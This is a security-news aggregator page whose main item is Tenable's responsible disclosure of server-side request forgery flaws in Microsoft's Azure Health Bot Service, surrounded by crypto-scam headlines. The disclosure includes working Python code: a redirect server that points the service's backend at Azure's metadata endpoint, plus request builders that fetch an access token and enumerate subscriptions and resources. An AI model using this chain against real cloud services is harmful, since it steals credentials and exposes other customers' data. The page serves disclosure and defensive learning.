CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations
As digital currencies have grown, so have cryptocurrency scams, posing significant risks to users. The rise of AI and deepfake technology has intensified scams that exploit famous personalities and events by creating realistic fake videos. Platforms like X and YouTube have been especially targeted, with scammers hijacking high-profile accounts to distribute fraudulent content. This report delves into the CryptoCore group's complex scam operations, analyzing their use of deepfakes, hijacked accounts, and fraudulent websites to deceive victims and net millions of dollars.
The post CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations appeared first on Avast Threat Labs.
Over 100 Ukrainian computers infected with backdoor malware, researchers say
Microsoft PlayReady WMRMECC256 Key / root key issue (attack #5)
Horizon3.ai Partners with FedHIVE to Revolutionize Cybersecurity in the Public Sector
Proactive Security | Enhancing Risk Visibility with Extended Security Posture Management (xSPM)
Introducing HTTP request traffic insights on Cloudflare Radar
Cequence Storms Black Hat with API Security Testing for Generative AI Applications
That’s a wrap for Black Hat 2024! We had a great show and met many of you at the booth or on the show floor. I hope you were able to come by, watch a session by Jason Kent, Hacker in Residence at Cequence, or Parth Shukla, Security Engineer at Cequence, and maybe even enter […]
The post Cequence Storms Black Hat with API Security Testing for Generative AI Applications appeared first on Cequence Security.
Preparation Is Not Optional: 10 Incident Response Readiness Considerations for Any Organization
Researchers Uncover Vulnerabilities in AI-Powered Azure Health Bot Service
Dispelling Continuous Threat Exposure Management (CTEM) Myths
Compromising Microsoft's AI Healthcare Chatbot Service
Tenable Research discovered multiple privilege-escalation issues in the Azure Health Bot Service via a server-side request forgery (SSRF), which allowed researchers access to cross-tenant resources.
Key takeaways
- The Azure Health Bot Service is a cloud platform that allows healthcare professionals to deploy AI-powered virtual health assistants.
- Tenable Research discovered critical vulnerabilities that allowed access to cross-tenant resources within this service. Based on the level of access granted, it’s likely that lateral movement to other resources would have been possible.
- According to Microsoft, mitigations for these issues have been applied to all affected services and regions. No customer action is required.
(Source: Image generated via ChatGPT 4o / DALL-E by Nick Miles)
An overview of the Azure Health Bot Service
This is how Microsoft describes the Azure Health Bot Service:
“The Azure Health Bot Service is a cloud platform that empowers developers in Healthcare organizations to build and deploy compliant, AI-powered virtual health assistants, that help them improve processes and reduce costs. It allows healthcare organizations to create experiences that act as copilots for their healthcare professionals to further manage administrative workloads, and experiences that engage with their patients.”
Essentially, the service allows healthcare providers to create and deploy patient-facing chatbots to handle administrative workflows within their environments. Thus, these chatbots generally have some amount of access to sensitive patient information, though the information available to these bots can vary based on each bot’s configuration.
While auditing this service for security issues, Tenable researchers became interested in a feature dubbed "Data Connections" in the service's documentation. These data connections allow bots to interact with external data sources to retrieve information from other services that the provider may be using, such as a portal for patient information or a reference database for general medical information.
The first discovery
This data connection feature is designed to allow the service’s backend to make requests to third-party APIs. While testing whether these data connections could reach endpoints internal to the service, Tenable researchers found that many common endpoints, such as Azure’s Instance Metadata Service (IMDS), were appropriately filtered or inaccessible. Upon closer inspection, however, they discovered that issuing redirect responses (e.g., 301/302 status codes) allowed these mitigations to be bypassed.
“A server-side request forgery is a web security vulnerability that allows an attacker to force an application on a remote host to make requests to an unintended location.”
For example, by configuring a data connection within the service’s scenario editor, researchers were able to specify an external host under their control.
On this external host, researchers configured it to respond to requests with a 301 redirect response destined for Azure’s IMDS.
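A minimal sketch of what such a redirect host might look like, assuming Python on the attacker-controlled server. The IMDS URL is Azure's documented managed-identity token endpoint; the exact destination the researchers used is not stated in the post.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Azure's documented IMDS token endpoint, requesting a token scoped to
# Azure Resource Manager (management.azure.com).
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)


class RedirectHandler(BaseHTTPRequestHandler):
    """Answer every request with a 301 pointing at the IMDS endpoint."""

    def do_GET(self):
        self.send_response(301)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

    def do_POST(self):  # a data connection may issue POSTs as well
        self.do_GET()


def serve(port: int = 8080) -> None:
    """Run the redirect server (blocks); point the data connection here."""
    HTTPServer(("0.0.0.0", port), RedirectHandler).serve_forever()
```

If the service's HTTP client follows the redirect and lets the attacker influence request headers (IMDS requires a `Metadata: true` header), the SSRF filter on the original URL is effectively sidestepped.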
After obtaining a valid metadata response, researchers requested an access token scoped to management.azure.com.
With this token, researchers were then able to list the subscriptions they had access to via a call to https://management.azure.com/subscriptions?api-version=2020-01-01, which provided them with a subscription ID internal to Microsoft.
Finally, researchers were able to list the resources they had access to via https://management.azure.com/subscriptions/&lt;REDACTED&gt;/resources?api-version=2020-10-01. The resulting list contained hundreds of resources belonging to other customers.
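The token-to-enumeration chain above can be sketched as simple request builders. The function names are hypothetical; the URLs and API versions are those quoted in the post, and the `Metadata: true` header is required by Azure IMDS.

```python
MGMT = "https://management.azure.com"


def imds_token_request() -> tuple:
    """The request the backend is redirected into: fetch a managed-identity token."""
    url = (
        "http://169.254.169.254/metadata/identity/oauth2/token"
        "?api-version=2018-02-01&resource=" + MGMT + "/"
    )
    return url, {"Metadata": "true"}  # IMDS rejects requests without this header


def list_subscriptions_request(token: str) -> tuple:
    """List subscriptions visible to the stolen identity."""
    url = f"{MGMT}/subscriptions?api-version=2020-01-01"
    return url, {"Authorization": f"Bearer {token}"}


def list_resources_request(token: str, subscription_id: str) -> tuple:
    """Enumerate resources in a subscription returned by the previous call."""
    url = f"{MGMT}/subscriptions/{subscription_id}/resources?api-version=2020-10-01"
    return url, {"Authorization": f"Bearer {token}"}
```

Each step feeds the next: the IMDS response supplies the bearer token, and the subscriptions response supplies the subscription ID used in the final enumeration call.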
A quick fix
Upon seeing that these resources contained identifiers indicating cross-tenant information (i.e., information for other users/customers of the service), Tenable researchers immediately halted their investigation of this attack vector and reported their findings to MSRC on June 17, 2024. MSRC acknowledged Tenable’s report and began their investigation the same day.
Within the week, MSRC confirmed Tenable’s report and began introducing fixes into the affected environments. As of July 2, MSRC has stated that fixes have been rolled out to all regions. To Tenable’s knowledge, no evidence was discovered that indicated this issue had been exploited by a malicious actor.
Doing it again
Once MSRC stated that this issue had been fixed, Tenable Research picked up where it left off to confirm that the original proofs of concept provided to MSRC during the disclosure process no longer worked. As it turns out, the fix was simply to reject redirect status codes altogether for data connection endpoints, which eliminated this attack vector.
That said, researchers discovered another endpoint used for validating data connections for FHIR endpoints. This validation mechanism was vulnerable to essentially the same attack described above; the difference between the two issues is their overall impact. The FHIR endpoint vector did not allow influencing request headers, which limited the ability to access IMDS directly (IMDS requires a Metadata header on incoming requests). While other service internals were accessible via this vector, Microsoft has stated that this particular vulnerability allowed no cross-tenant access.
As before, the researchers immediately halted their investigation and reported the finding to Microsoft, opting to respect MSRC’s guidance regarding accessing cross-tenant resources. This second issue was reported on July 9 with fixes available by July 12. As with the first issue, to Tenable’s knowledge, no evidence was discovered that indicated this issue had been exploited by a malicious actor.
Conclusion
The vulnerabilities discussed in this post involve flaws in the underlying architecture of the AI chatbot service rather than in the AI models themselves. As Lucas Tamagna-Darr explained in a Tenable research blog post last week, this highlights the continued importance of traditional web application and cloud security mechanisms in this new age of AI-powered services.
Please see TRA-2024-27 and TRA-2024-28 for more information regarding each of the discoveries mentioned in this post.
CryptoScam Strikes Misusing Trump & Musk Interview
Scammers have exploited the popularity of former President Donald Trump and tech mogul Elon Musk to deceive unsuspecting victims. According to a recent tweet by Avast Threat Labs, the fraudulent scheme involved hijacking YouTube accounts to broadcast fake interviews, and within just a few hours, it amassed approximately $9,000. Hijacked YouTube Accounts Fuel Deception The […]
The post CryptoScam Strikes Misusing Trump & Musk Interview appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.